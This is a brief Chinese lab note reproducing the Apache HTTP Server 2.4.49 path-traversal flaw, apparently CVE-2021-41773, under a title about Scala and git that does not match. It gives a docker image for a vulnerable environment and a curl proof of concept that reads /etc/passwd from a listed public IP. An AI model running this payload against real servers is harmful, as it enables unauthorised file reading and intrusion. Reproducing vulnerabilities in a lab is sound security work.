技术周总结 08.05-08.11周日(scala git回滚)

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid

漏洞复现

http://1.15.136.212:8080

1.使⽤poc

curl http://1.15.136.212:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd